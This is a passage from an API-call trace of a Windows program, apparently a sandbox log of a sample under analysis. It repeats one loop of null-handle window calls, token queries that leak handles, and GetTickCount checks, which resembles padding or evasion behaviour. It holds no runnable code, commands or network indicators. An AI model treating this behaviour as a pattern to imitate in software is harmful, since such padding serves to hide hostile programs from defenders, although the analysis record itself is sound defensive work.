SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.729] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.730] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.730] TextOutW (hdc=0x0, x=3764, y=9174, lpString="", c=0) returned 1 [0072.730] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.730] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.730] GetTickCount () returned 0x1f44e [0072.731] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.731] SetForegroundWindow (hWnd=0x0) returned 0 [0072.731] BringWindowToTop (hWnd=0x0) returned 0 [0072.731] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x818) returned 1 [0072.731] GetTokenInformation (in: TokenHandle=0x818, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.731] GetLastError () returned 0x7a [0072.731] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.731] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.732] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.734] TextOutW (hdc=0x0, x=3774, y=9199, lpString="", c=0) returned 1 [0072.734] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.734] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.734] GetTickCount () returned 0x1f44e [0072.734] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.734] SetForegroundWindow (hWnd=0x0) returned 0 [0072.734] BringWindowToTop (hWnd=0x0) returned 0 [0072.734] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x81c) returned 1 [0072.734] GetTokenInformation (in: TokenHandle=0x81c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.734] GetLastError () returned 0x7a [0072.735] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.735] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.735] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.735] TextOutW (hdc=0x0, x=3784, y=9224, lpString="", c=0) returned 1 [0072.735] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.735] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.735] GetTickCount () returned 0x1f44e [0072.738] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.738] SetForegroundWindow (hWnd=0x0) returned 0 [0072.738] BringWindowToTop (hWnd=0x0) returned 0 [0072.738] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x820) returned 1 [0072.738] GetTokenInformation (in: TokenHandle=0x820, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.738] GetLastError () returned 0x7a [0072.738] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.738] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.738] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.738] TextOutW (hdc=0x0, x=3794, y=9249, lpString="", c=0) returned 1 [0072.738] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.738] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.739] GetTickCount () returned 0x1f45d [0072.740] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.740] SetForegroundWindow (hWnd=0x0) returned 0 [0072.740] BringWindowToTop (hWnd=0x0) returned 0 [0072.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x824) returned 1 [0072.740] GetTokenInformation (in: TokenHandle=0x824, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.740] GetLastError () returned 0x7a [0072.740] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.740] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.740] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.740] TextOutW (hdc=0x0, x=3804, y=9274, lpString="", c=0) returned 1 [0072.740] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.740] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.740] GetTickCount () returned 0x1f45d [0072.741] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.741] SetForegroundWindow (hWnd=0x0) returned 0 [0072.741] BringWindowToTop (hWnd=0x0) returned 0 [0072.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x828) returned 1 [0072.741] GetTokenInformation (in: TokenHandle=0x828, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.741] GetLastError () returned 0x7a [0072.741] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.741] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.741] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.742] TextOutW (hdc=0x0, x=3814, y=9299, lpString="", c=0) returned 1 [0072.742] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.742] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.742] GetTickCount () returned 0x1f45d [0072.748] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.748] SetForegroundWindow (hWnd=0x0) returned 0 [0072.748] BringWindowToTop (hWnd=0x0) returned 0 [0072.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x82c) returned 1 [0072.748] GetTokenInformation (in: TokenHandle=0x82c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.748] GetLastError () returned 0x7a [0072.748] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.748] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.749] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.749] TextOutW (hdc=0x0, x=3824, y=9324, lpString="", c=0) returned 1 [0072.749] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.749] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.749] GetTickCount () returned 0x1f45d [0072.749] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.749] SetForegroundWindow (hWnd=0x0) returned 0 [0072.749] BringWindowToTop (hWnd=0x0) returned 0 [0072.750] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x830) returned 1 [0072.750] GetTokenInformation (in: TokenHandle=0x830, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.750] GetLastError () returned 0x7a [0072.750] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.750] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.750] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.750] TextOutW (hdc=0x0, x=3834, y=9349, lpString="", c=0) returned 1 [0072.750] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.750] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.750] GetTickCount () returned 0x1f45d [0072.751] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.751] SetForegroundWindow (hWnd=0x0) returned 0 [0072.751] BringWindowToTop (hWnd=0x0) returned 0 [0072.751] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x834) returned 1 [0072.751] GetTokenInformation (in: TokenHandle=0x834, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.751] GetLastError () returned 0x7a [0072.751] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.752] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.752] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.752] TextOutW (hdc=0x0, x=3844, y=9374, lpString="", c=0) returned 1 [0072.752] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.752] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.752] GetTickCount () returned 0x1f45d [0072.752] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.753] SetForegroundWindow (hWnd=0x0) returned 0 [0072.753] BringWindowToTop (hWnd=0x0) returned 0 [0072.753] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x838) returned 1 [0072.753] GetTokenInformation (in: TokenHandle=0x838, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.753] GetLastError () returned 0x7a [0072.753] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.753] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.754] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.754] TextOutW (hdc=0x0, x=3854, y=9399, lpString="", c=0) returned 1 [0072.754] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.754] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.754] GetTickCount () returned 0x1f46d [0072.755] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.755] SetForegroundWindow (hWnd=0x0) returned 0 [0072.755] BringWindowToTop (hWnd=0x0) returned 0 [0072.755] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x83c) returned 1 [0072.755] GetTokenInformation (in: TokenHandle=0x83c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.755] GetLastError () returned 0x7a [0072.755] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.755] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.755] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.755] TextOutW (hdc=0x0, x=3864, y=9424, lpString="", c=0) returned 1 [0072.756] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.756] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.756] GetTickCount () returned 0x1f46d [0072.756] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.756] SetForegroundWindow (hWnd=0x0) returned 0 [0072.756] BringWindowToTop (hWnd=0x0) returned 0 [0072.756] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x840) returned 1 [0072.756] GetTokenInformation (in: TokenHandle=0x840, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.756] GetLastError () returned 0x7a [0072.756] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.756] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.757] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.757] TextOutW (hdc=0x0, x=3874, y=9449, lpString="", c=0) returned 1 [0072.757] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.757] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.757] GetTickCount () returned 0x1f46d [0072.758] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.758] SetForegroundWindow (hWnd=0x0) returned 0 [0072.758] BringWindowToTop (hWnd=0x0) returned 0 [0072.758] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x844) returned 1 [0072.758] GetTokenInformation (in: TokenHandle=0x844, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.758] GetLastError () returned 0x7a [0072.758] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.758] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.759] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.759] TextOutW (hdc=0x0, x=3884, y=9474, lpString="", c=0) returned 1 [0072.759] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.759] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.759] GetTickCount () returned 0x1f46d [0072.759] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.759] SetForegroundWindow (hWnd=0x0) returned 0 [0072.759] BringWindowToTop (hWnd=0x0) returned 0 [0072.760] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x848) returned 1 [0072.760] GetTokenInformation (in: TokenHandle=0x848, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.760] GetLastError () returned 0x7a [0072.760] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.760] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.760] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.760] TextOutW (hdc=0x0, x=3894, y=9499, lpString="", c=0) returned 1 [0072.760] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.760] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.760] GetTickCount () returned 0x1f46d [0072.761] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.761] SetForegroundWindow (hWnd=0x0) returned 0 [0072.761] BringWindowToTop (hWnd=0x0) returned 0 [0072.761] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x84c) returned 1 [0072.761] GetTokenInformation (in: TokenHandle=0x84c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.761] GetLastError () returned 0x7a [0072.761] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.761] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.762] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.762] TextOutW (hdc=0x0, x=3904, y=9524, lpString="", c=0) returned 1 [0072.762] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.762] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.762] GetTickCount () returned 0x1f46d [0072.763] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.763] SetForegroundWindow (hWnd=0x0) returned 0 [0072.763] BringWindowToTop (hWnd=0x0) returned 0 [0072.763] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x850) returned 1 [0072.763] GetTokenInformation (in: TokenHandle=0x850, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.763] GetLastError () returned 0x7a [0072.763] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.763] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.763] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.763] TextOutW (hdc=0x0, x=3914, y=9549, lpString="", c=0) returned 1 [0072.763] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.763] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.763] GetTickCount () returned 0x1f46d [0072.764] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.764] SetForegroundWindow (hWnd=0x0) returned 0 [0072.764] BringWindowToTop (hWnd=0x0) returned 0 [0072.764] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x854) returned 1 [0072.765] GetTokenInformation (in: TokenHandle=0x854, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.765] GetLastError () returned 0x7a [0072.765] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.765] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.765] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.765] TextOutW (hdc=0x0, x=3924, y=9574, lpString="", c=0) returned 1 [0072.765] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.765] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.765] GetTickCount () returned 0x1f46d [0072.767] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.767] SetForegroundWindow (hWnd=0x0) returned 0 [0072.767] BringWindowToTop (hWnd=0x0) returned 0 [0072.767] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x858) returned 1 [0072.768] GetTokenInformation (in: TokenHandle=0x858, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.768] GetLastError () returned 0x7a [0072.768] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.768] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.768] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.768] TextOutW (hdc=0x0, x=3934, y=9599, lpString="", c=0) returned 1 [0072.768] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.768] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.768] GetTickCount () returned 0x1f46d [0072.769] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.769] SetForegroundWindow (hWnd=0x0) returned 0 [0072.769] BringWindowToTop (hWnd=0x0) returned 0 [0072.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x85c) returned 1 [0072.769] GetTokenInformation (in: TokenHandle=0x85c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.769] GetLastError () returned 0x7a [0072.769] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.769] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.770] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.770] TextOutW (hdc=0x0, x=3944, y=9624, lpString="", c=0) returned 1 [0072.770] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.770] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.770] GetTickCount () returned 0x1f47d [0072.770] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.771] SetForegroundWindow (hWnd=0x0) returned 0 [0072.771] BringWindowToTop (hWnd=0x0) returned 0 [0072.771] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x860) returned 1 [0072.771] GetTokenInformation (in: TokenHandle=0x860, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.771] GetLastError () returned 0x7a [0072.771] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.771] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.771] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.771] TextOutW (hdc=0x0, x=3954, y=9649, lpString="", c=0) returned 1 [0072.771] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.771] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.771] GetTickCount () returned 0x1f47d [0072.772] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.772] SetForegroundWindow (hWnd=0x0) returned 0 [0072.772] BringWindowToTop (hWnd=0x0) returned 0 [0072.772] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x864) returned 1 [0072.772] GetTokenInformation (in: TokenHandle=0x864, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.772] GetLastError () returned 0x7a [0072.773] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.773] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.773] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.773] TextOutW (hdc=0x0, x=3964, y=9674, lpString="", c=0) returned 1 [0072.773] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.773] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 